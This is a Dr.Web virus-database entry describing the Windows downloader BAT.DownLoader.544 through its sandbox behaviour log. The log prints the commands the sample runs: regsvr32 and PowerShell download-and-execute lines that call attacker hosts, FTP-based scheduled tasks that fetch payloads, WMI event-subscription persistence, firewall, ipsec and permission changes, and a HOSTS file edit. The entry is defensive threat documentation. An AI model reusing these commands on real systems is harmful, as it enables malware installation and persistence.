La mia libreria
La mia libreria

+ Aggiungi alla libreria

Supporto
Supporto 24/7 | Regole per contattare

Richieste

Profile

BAT.DownLoader.544

Aggiunto al database dei virus Dr.Web: 2020-05-21

La descrizione è stata aggiunta:

Technical Information

To ensure autorun and distribution
Modifies the following registry keys
  • [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'start' = 'regsvr32 /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll'
  • [<HKLM>\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run] 'start' = 'regsvr32 /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll'
  • [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vid001.exe] 'Debugger' = 'ntsd -d'
  • [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uihost64.exe] 'Debugger' = 'ntsd -d'
  • [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uihost32.exe] 'Debugger' = 'ntsd -d'
Creates or modifies the following files
  • <SYSTEM32>\tasks\mysa
  • <SYSTEM32>\tasks\mysa1
  • <SYSTEM32>\tasks\mysa2
  • <SYSTEM32>\tasks\mysa3
  • <SYSTEM32>\tasks\ok
  • <SYSTEM32>\tasks\microsoftwindows
Sets the following service settings
  • [<HKLM>\System\CurrentControlSet\Services\MpsSvc] 'Start' = '00000002'
  • [<HKLM>\System\CurrentControlSet\Services\PolicyAgent] 'Start' = '00000002'
Malicious functions
Executes the following
  • '<SYSTEM32>\net.exe' stop AnyDesk
  • '<SYSTEM32>\taskkill.exe' /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe /im docv8.exe /im king.exe /im name.exe /im doc.exe /im wodCmdTerm.exe /im win1ogins.e...
  • '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow
  • '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="deny tcp 445" dir=in protocol=tcp localport=445 action=block
  • '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="deny tcp 139" dir=in protocol=tcp localport=139 action=block
  • '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="tcpall" dir=out protocol=tcp localport=0-65535 action=allow
  • '<SYSTEM32>\taskkill.exe' /f /im powershell.exe
  • '%WINDIR%\syswow64\taskkill.exe' /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe /im docv8.exe /im king.exe /im name.exe /im doc.exe /im spooly.exe /im win1ogins.exe /...
Downloads
  • http://22#.##.247.152:8152/batpower.txt
Modifies file system
Modifies the HOSTS file.
Miscellaneous
Searches for the following windows
  • ClassName: '' WindowName: ''
Creates and executes the following
  • '%WINDIR%\temp\conhoa.exe' ' (with hidden window)
  • '%WINDIR%\temp\conhoa.exe' -u' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /c mkdir %WINDIR%\inf\aspnet&echo 1><DRIVERS>\etc\hosts' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /c %WINDIR%\Temp\wmi.bat' (with hidden window)
  • '%WINDIR%\temp\u.exe' ' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /c sc start xWinWpdSrv&ping 127.0.0.1 -n 10 && del %WINDIR%\Temp\u.exe >> NUL' (with hidden window)
Executes the following
  • '<SYSTEM32>\net1.exe' user mm123$ /del
  • '<SYSTEM32>\schtasks.exe' /create /tn "ok" /tr "rundll32.exe %WINDIR%\debug\ok.dat,ServiceMain aaaa" /ru "system" /sc onstart /F
  • '<SYSTEM32>\schtasks.exe' /create /tn "MicrosoftWindows" /tr "%WINDIR%\help\spoolys.exe" /ru "system" /sc onstart /F
  • '<SYSTEM32>\schtasks.exe' /run /tn MicrosoftWindows
  • '<SYSTEM32>\wbem\wmic.exe' process where "name='svchost.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\svchost.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\svchost.exe'" delete
  • '<SYSTEM32>\wbem\wmic.exe' process where "name='wininit.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\wininit.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\wininit.exe'" delete
  • '<SYSTEM32>\wbem\wmic.exe' process where "name='csrss.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\csrss.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\csrss.exe'" delete
  • '<SYSTEM32>\wbem\wmic.exe' process where "name='WUDFHosts.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\WUDFHosts.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\WUDFHosts.exe'" delete
  • '<SYSTEM32>\wbem\wmic.exe' process where "name='services.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\services.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\services.exe'" delete
  • '<SYSTEM32>\wbem\wmic.exe' process where "name='lsass.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\lsass.exe'" delete
  • '<SYSTEM32>\wbem\wmic.exe' datafile where "Name='c:\\windows\\debug\\lsmos.exe'" get Version /value
  • '<SYSTEM32>\findstr.exe' "=1\.0\.0\.1$"
  • '<SYSTEM32>\cmd.exe' /c wmic process where "ExecutablePath='c:\\windows\\debug\\lsmos.exe'" get ProcessId|findstr "[0-9]"
  • '<SYSTEM32>\schtasks.exe' /create /tn "Mysa2" /tr "cmd /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat %WINDIR%\debug\item.dat>>p&echo bye>>p&ftp -s:p" /ru "system" /sc onstart /F
  • '<SYSTEM32>\schtasks.exe' /create /tn "Mysa3" /tr "cmd /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar %WINDIR%\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&%WINDIR%\help\lsmosee.exe" /ru "sys...
  • '<SYSTEM32>\wbem\wmic.exe' process where "ExecutablePath='c:\\windows\\debug\\lsmos.exe'" get ProcessId
  • '<SYSTEM32>\schtasks.exe' /Delete /TN "OfficeUpdaterA" /F
  • '<SYSTEM32>\schtasks.exe' /Delete /TN "\Microsoft\Windows\RAC\BackUpEvent" /F
  • '<SYSTEM32>\schtasks.exe' /Delete /TN "WindowsUpdate3" /F
  • '<SYSTEM32>\schtasks.exe' /Delete /TN "at6" /F
  • '<SYSTEM32>\schtasks.exe' /Delete /TN "Windows_Update" /F
  • '<SYSTEM32>\schtasks.exe' /Delete /TN "Update" /F
  • '<SYSTEM32>\schtasks.exe' /Delete /TN "Update2" /F
  • '<SYSTEM32>\schtasks.exe' /Delete /TN "Update4" /F
  • '<SYSTEM32>\schtasks.exe' /Delete /TN "Update3" /F
  • '<SYSTEM32>\schtasks.exe' /Delete /TN "windowsinit" /F
  • '<SYSTEM32>\schtasks.exe' /Delete /TN "System Security Check" /F
  • '<SYSTEM32>\schtasks.exe' /Delete /TN "AdobeFlashPlayer" /F
  • '<SYSTEM32>\findstr.exe' "[0-9]"
  • '<SYSTEM32>\schtasks.exe' /Delete /TN "WindowsUpdate1" /F
  • '<SYSTEM32>\schtasks.exe' /create /tn "Mysa1" /tr "rundll32.exe %WINDIR%\debug\item.dat,ServiceMain aaaa" /ru "system" /sc onstart /F
  • '<SYSTEM32>\sc.exe' delete "Wshrhx qlyndxmcsiuf7f"
  • '<SYSTEM32>\schtasks.exe' /Delete /TN "at1" /F
  • '<SYSTEM32>\net1.exe' stop netsv
  • '<SYSTEM32>\sc.exe' delete netsv
  • '<SYSTEM32>\net1.exe' stop NetworkServices
  • '<SYSTEM32>\sc.exe' delete NetworkServices
  • '<SYSTEM32>\net1.exe' stop "Network Remote"
  • '<SYSTEM32>\sc.exe' delete "Network Remote"
  • '<SYSTEM32>\net1.exe' stop "WinTaskCtrlService"
  • '<SYSTEM32>\sc.exe' delete "WinTaskCtrlService"
  • '<SYSTEM32>\net1.exe' stop remotecall
  • '<SYSTEM32>\sc.exe' delete remotecall
  • '<SYSTEM32>\net1.exe' stop rpcept
  • '<SYSTEM32>\sc.exe' delete rpcept
  • '<SYSTEM32>\net1.exe' stop csrss
  • '<SYSTEM32>\sc.exe' delete csrss
  • '<SYSTEM32>\net1.exe' stop "windows audio control"
  • '<SYSTEM32>\sc.exe' delete "windows audio control"
  • '<SYSTEM32>\net1.exe' stop "gyoidf2wl2cw8ce"
  • '<SYSTEM32>\sc.exe' delete "gyoidf2wl2cw8ce"
  • '<SYSTEM32>\net1.exe' stop "Rsisem eqawcgyjqi"
  • '<SYSTEM32>\sc.exe' delete "Rsisem eqawcgyjqi"
  • '<SYSTEM32>\net1.exe' stop "Rssphs zxsxavyaobwa"
  • '<SYSTEM32>\sc.exe' delete "Rssphs zxsxavyaobwa"
  • '<SYSTEM32>\net1.exe' stop "WinTcpAutoProxyStc"
  • '<SYSTEM32>\sc.exe' delete "WinTcpAutoProxyStc"
  • '<SYSTEM32>\net1.exe' stop "Ws5oq3qwi gyogazxcwce"
  • '<SYSTEM32>\sc.exe' delete "Ws5oq3qwi gyogazxcwce"
  • '<SYSTEM32>\net1.exe' stop "Wshrhx qlyndxmcsiuf7f"
  • '<SYSTEM32>\schtasks.exe' /Delete /TN "updat_windows" /F
  • '<SYSTEM32>\net1.exe' stop MicrosoftMsql
  • '<SYSTEM32>\schtasks.exe' /create /tn "Mysa" /tr "cmd /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe %WINDIR%\update.exe>>s&echo bye>>s&ftp -s:s&%WINDIR%\update.exe" /ru "system"...
  • '<SYSTEM32>\cacls.exe' %WINDIR%\Help\lsass.exe /e /d system
  • '<SYSTEM32>\schtasks.exe' /Delete /TN "at2" /F
  • '<SYSTEM32>\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='Windows Events Filter'" DELETE
  • '<SYSTEM32>\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE
  • '<SYSTEM32>\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE
  • '<SYSTEM32>\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckayoumm3" DELETE
  • '<SYSTEM32>\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE
  • '<SYSTEM32>\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="coronav" DELETE
  • '<SYSTEM32>\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="coronav2" DELETE
  • '<SYSTEM32>\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="coronav2" DELETE
  • '<SYSTEM32>\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='coronav2'" DELETE
  • '<SYSTEM32>\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="fuckamm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE ...
  • '<SYSTEM32>\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckamm4", CommandLineTemplate="cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wm...
  • '<SYSTEM32>\cmd.exe' /c start wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"fuckamm3\"", Consumer="CommandLineEventConsumer.Name=\"fuckamm4\""
  • '<SYSTEM32>\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"fuckamm3\"", Consumer="CommandLineEventConsumer.Name=\"fuckamm4\""
  • '<SYSTEM32>\cmd.exe' /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://22#.##.247.152:8152/batpower.txt')
  • '<SYSTEM32>\icacls.exe' %WINDIR%\temp\*.exe /reset
  • '<SYSTEM32>\schtasks.exe' /create /tn MicrosoftsWindowsu /tr %WINDIR%\temp\conhoa.exe /ru system /sc minute /mo 9 /f
  • '<SYSTEM32>\schtasks.exe' /create /tn MicrosoftsWindowsu2 /tr %WINDIR%\temp\conhot.exe /ru system /sc minute /mo 11 /f
  • '<SYSTEM32>\schtasks.exe' /run /tn oka
  • '<SYSTEM32>\schtasks.exe' /run /tn MicrosoftsWindowsu
  • '<SYSTEM32>\schtasks.exe' /run /tn MicrosoftsWindowsu2
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im powershell.exe
  • '%WINDIR%\syswow64\cmd.exe' /c mkdir %WINDIR%\inf\aspnet&echo 1><DRIVERS>\etc\hosts
  • '%WINDIR%\syswow64\cmd.exe' /c %WINDIR%\Temp\wmi.bat
  • '%WINDIR%\syswow64\net1.exe' stop ASBservice
  • '%WINDIR%\syswow64\cmd.exe' /c sc start xWinWpdSrv&ping 127.0.0.1 -n 10 && del %WINDIR%\Temp\u.exe >> NUL
  • '%WINDIR%\syswow64\sc.exe' start xWinWpdSrv
  • '%WINDIR%\syswow64\ping.exe' 127.0.0.1 -n 10
  • '%WINDIR%\syswow64\sc.exe' delete ASBservice
  • '%WINDIR%\syswow64\net1.exe' stop msupdate
  • '<SYSTEM32>\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="Windows Events Consumer" DELETE
  • '<SYSTEM32>\sc.exe' delete clr_optimization_v4.0.30328_64
  • '<SYSTEM32>\sc.exe' delete MicrosoftMsql
  • '<SYSTEM32>\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm2_consumer" DELETE
  • '<SYSTEM32>\schtasks.exe' /DELETE /TN "\Microsoft\Windows\UPnP\Services" /f
  • '<SYSTEM32>\schtasks.exe' /Delete /TN "Microsoft LocalManager[Windows Server 2008 R2 Standard]" /F
  • '<SYSTEM32>\sc.exe' config MpsSvc start= auto
  • '<SYSTEM32>\net.exe' start MpsSvc
  • '<SYSTEM32>\net1.exe' start MpsSvc
  • '<SYSTEM32>\netsh.exe' ipsec static delete policy name=win
  • '<SYSTEM32>\netsh.exe' ipsec static delete filterlist name=Allowlist
  • '<SYSTEM32>\netsh.exe' ipsec static delete filterlist name=denylist
  • '<SYSTEM32>\netsh.exe' ipsec static delete filteraction name=allow
  • '<SYSTEM32>\netsh.exe' advfirewall firewall delete rule name="tcp all" dir=in
  • '<SYSTEM32>\netsh.exe' advfirewall firewall delete rule name="deny tcp 445" dir=in
  • '<SYSTEM32>\netsh.exe' advfirewall firewall delete rule name="deny tcp 139" dir=in
  • '<SYSTEM32>\netsh.exe' advfirewall firewall delete rule name="tcpall" dir=out
  • '<SYSTEM32>\netsh.exe' advfirewall set allprofiles state on
  • '<SYSTEM32>\netsh.exe' ipsec static add policy name=win
  • '<SYSTEM32>\netsh.exe' ipsec static add filterlist name=Allowlist
  • '<SYSTEM32>\netsh.exe' ipsec static add filterlist name=denylist
  • '<SYSTEM32>\netsh.exe' ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
  • '<SYSTEM32>\netsh.exe' ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
  • '<SYSTEM32>\netsh.exe' ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
  • '<SYSTEM32>\netsh.exe' ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
  • '<SYSTEM32>\netsh.exe' ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
  • '<SYSTEM32>\netsh.exe' ipsec static add filteraction name=Allow action=permit
  • '<SYSTEM32>\netsh.exe' ipsec static add filteraction name=deny action=block
  • '<SYSTEM32>\netsh.exe' ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
  • '<SYSTEM32>\netsh.exe' ipsec static set policy name=win assign=y
  • '<SYSTEM32>\cmd.exe' /S /D /c" ver "
  • '<SYSTEM32>\find.exe' "5.1."
  • '<SYSTEM32>\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm2_filter" DELETE
  • '<SYSTEM32>\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="Windows Events Filter" DELETE
  • '<SYSTEM32>\schtasks.exe' /Delete /TN "Microsoft LocalManager[Windows Server 2008 R2 Enterprise]" /F
  • '<SYSTEM32>\net1.exe' stop clr_optimization_v4.0.30328_64
  • '<SYSTEM32>\sc.exe' delete msupdate
  • '<SYSTEM32>\net1.exe' stop msupdate
  • '<SYSTEM32>\cacls.exe' C:\Msupdate /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\xcecg /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\ccm /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\smss.exe /e /d system
  • '<SYSTEM32>\cacls.exe' "%CommonProgramFiles%\Services\*.exe" /e /d system
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\a.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\security\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\security\*.exe /e /d everyone
  • '<SYSTEM32>\cacls.exe' %WINDIR%\Resources\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\Resources\*.exe /e /d everyone
  • '<SYSTEM32>\cacls.exe' %WINDIR%\Resources\Themes\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\Resources\Themes\*.exe /e /d everyone
  • '<SYSTEM32>\cacls.exe' %WINDIR%\system\lsmsm.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE%\homegroup\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE%\diskdata\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' "%ProgramFiles%\Microsoft Updates" /e /d system
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\servwdrv.dll /e /d system
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\servwdrv.dll /e /d everyone
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\servwdrvx.dll /e /d system
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\servwdrvx.dll /e /d everyone
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\serwwdrv.dll /e /d system
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\serwwdrv.dll /e /d everyone
  • '<SYSTEM32>\cacls.exe' %WINDIR%\svchost.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE%\WmiAppSrv\svchost.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\Help\taskhost.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\Web\wininit.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE%\Microsoft\WmiAppSvr\csrss.exe /e /d system
  • '<SYSTEM32>\cacls.exe' C:\Users\Default\AppData\Roaming\*.exe /e /g everyone:f
  • '<SYSTEM32>\cacls.exe' C:\Users\Default\AppData\Roaming /e /g system:f
  • '<SYSTEM32>\cacls.exe' C:\SysData\*.exe /e /d system
  • '%WINDIR%\syswow64\sc.exe' delete msupdate
  • '<SYSTEM32>\cacls.exe' C:\Progra~1\Common~1\svshpst.exe /e /d system
  • '<SYSTEM32>\cacls.exe' C:\Users\Default\AppData\Roaming /e /g everyone:f
  • '<SYSTEM32>\net1.exe' user sysadm05 /del
  • '<SYSTEM32>\net1.exe' stop AnyDesk
  • '<SYSTEM32>\sc.exe' config AnyDesk start= disabled
  • '<SYSTEM32>\attrib.exe' -s -h -r C:\Users\Default\AppData\Local\Temp\*.exe
  • '<SYSTEM32>\attrib.exe' -s -h -r C:\Users\Default\AppData\Roaming\Tempo\*.exe
  • '<SYSTEM32>\attrib.exe' -s -h -r C:\Users\Default\AppData\Roaming\*.exe
  • '<SYSTEM32>\attrib.exe' -s -h -r C:\Users\asp\AppData\Local\Temp\*.exe
  • '<SYSTEM32>\attrib.exe' -s -h -r C:\Users\asp\AppData\Roaming\Tempo\*.exe
  • '<SYSTEM32>\attrib.exe' -s -h -r C:\Users\asp\AppData\Roaming\*.exe
  • '<SYSTEM32>\attrib.exe' -s -h -r %TEMP%\*.exe
  • '<SYSTEM32>\attrib.exe' -s -h -r %APPDATA%\Tempo\*.exe
  • '<SYSTEM32>\attrib.exe' -s -h -r %APPDATA%\*.exe
  • '<SYSTEM32>\cacls.exe' %WINDIR%\debug\WIA\*.exe /e /d everyone
  • '<SYSTEM32>\net1.exe' user admin$a /del
  • '<SYSTEM32>\cacls.exe' C:\Users\asp\AppData\Roaming\Tempo\*.exe /e /d everyone
  • '<SYSTEM32>\cacls.exe' C:\Users\asp\AppData\Roaming\Tempo\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' C:\Users\Default\AppData\Roaming\Tempo\*.exe /e /d everyone
  • '<SYSTEM32>\cacls.exe' %APPDATA%\Tempo /e /d system
  • '<SYSTEM32>\cacls.exe' C:\Users\Default\AppData\Roaming\Tempo /e /d system
  • '<SYSTEM32>\cacls.exe' C:\Users\Default\AppData\Roaming\Tempo /e /d everyone
  • '<SYSTEM32>\cacls.exe' C:\Users\Default\AppData\Roaming\Tempo\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' C:\Users\asp\AppData\Roaming\*.exe /e /g everyone:f
  • '<SYSTEM32>\cacls.exe' %APPDATA% /e /g everyone:f
  • '<SYSTEM32>\cacls.exe' C:\Users\asp\AppData\Local\Temp /e /g system:f
  • '<SYSTEM32>\cacls.exe' C:\Users\asp\AppData\Local\Temp /e /g everyone:f
  • '<SYSTEM32>\cacls.exe' %LOCALAPPDATA%\Temp /e /g system:f
  • '<SYSTEM32>\cacls.exe' %LOCALAPPDATA%\Temp /e /g everyone:f
  • '<SYSTEM32>\cacls.exe' C:\Users\Default\AppData\Local\Temp /e /g everyone:f
  • '<SYSTEM32>\cacls.exe' %APPDATA%\Tempo /e /d everyone
  • '<SYSTEM32>\cacls.exe' C:\Users\Default\AppData\Local\Temp\*.exe /e /g everyone:f
  • '<SYSTEM32>\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="Windows Events Consumer4" DELETE
  • '<SYSTEM32>\cacls.exe' %WINDIR%\fonts\system32\svchost.exe /e /d system
  • '<SYSTEM32>\cacls.exe' "%WINDIR%\fonts\*.exe" /e /d system
  • '<SYSTEM32>\cacls.exe' %APPDATA%\Tempo\*.exe /e /d everyone
  • '<SYSTEM32>\cacls.exe' "%ProgramFiles(x86)%\Microsoft Blliasc\*.*" /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\syswow64\lsass.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\system\lsaus.exe /e /d system
  • '<SYSTEM32>\cacls.exe' "%ALLUSERSPROFILE%\clr_optimization_v4.0.30318_64\*.exe" /e /d system
  • '<SYSTEM32>\cacls.exe' "%ALLUSERSPROFILE%\Microsoft\clr_optimization_v4.0.30318_64\*.exe" /e /d system
  • '<SYSTEM32>\cacls.exe' "%ALLUSERSPROFILE%\CodeGear\Microsoft Office\DataFiles\Windows\Config\Microsoft\Images\Bugger\*.exe" /e /d system
  • '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE%\Microsoft\HelpLibrary\*.dll /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\WBEM\ccproxy\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE%\Microsoft\Network\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\mysql.log /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\Fonts\Msql\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\Media\Delta\aaf\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\wtcs.exe /e /d system
  • '<SYSTEM32>\cacls.exe' C:\Users\admin\AppData\Roaming\TempoRX\*.exe /e /d everyone
  • '<SYSTEM32>\cacls.exe' %APPDATA%\TempoRX\*.exe /e /d everyone
  • '<SYSTEM32>\reg.exe' add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.###1202.site:280/v.sct scrobj.dll" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.###1202.site:280/v.sct scrobj.dll" /f
  • '<SYSTEM32>\reg.exe' delete HKlm\Software\Microsoft\Windows\CurrentVersion\Run /v "start1" /f
  • '<SYSTEM32>\reg.exe' delete "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "SHELL" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vid001.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uihost64.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uihost32.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
  • '<SYSTEM32>\net.exe' start MSSQLSERVER
  • '<SYSTEM32>\net1.exe' start MSSQLSERVER
  • '<SYSTEM32>\cmd.exe' /c net1 stop ASBservice
  • '<SYSTEM32>\net1.exe' stop ASBservice
  • '<SYSTEM32>\sc.exe' delete ASBservice
  • '<SYSTEM32>\cacls.exe' %WINDIR%\fonts\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\Registration\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\Fonts\Microsoft /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\debug\Nat\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' C:\Users\Default\AppData\Roaming\*.exe /e /g system:f
  • '<SYSTEM32>\cacls.exe' %WINDIR%\taskmgrs.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\security\IIS\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' C:\Progra~1\Common~1\System\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' C:\Progra~1\dll\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' C:\Progra~1\Common~1\Services\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' C:\Progra~1\Common~1\SpeechEngines\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\Fonts\system32\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SpeechsTracing\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' "%ProgramFiles(x86)%\Microsoft SvidiaTen\*.exe" /e /d system
  • '<SYSTEM32>\cacls.exe' C:\Progra~1\Common~1\Micros~1\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' C:\System\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\1\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' c:\users\public\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' "%CommonProgramFiles%\conime.exe" /e /d system
  • '<SYSTEM32>\cacls.exe' "%CommonProgramFiles(x86)%\conime.exe" /e /d system
  • '<SYSTEM32>\cacls.exe' C:\Progra~1\test\*.exe /e /d everyone
  • '<SYSTEM32>\cacls.exe' %WINDIR%\Fonts\help\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\web\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' "%ProgramFiles%\SQLWriter$\*.exe" /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\Prefetch\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE%\WmiAppSvr\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\Fonts\Mysql\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\drivers\taskmgr.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\drivers\svchost.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\temp\svchost.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\Fonts\Windows\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE%\Temp\*.exe /e /d system
  • '<SYSTEM32>\cacls.exe' C:\Users\Public\Music\*.exe /e /d everyone
  • '<SYSTEM32>\cacls.exe' C:\Users\Public\Music\*.vbs /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\temp\*.dll /e /d system
  • '%WINDIR%\syswow64\net1.exe' stop clr_optimization_v4.0.30328_64

Curing recommendations

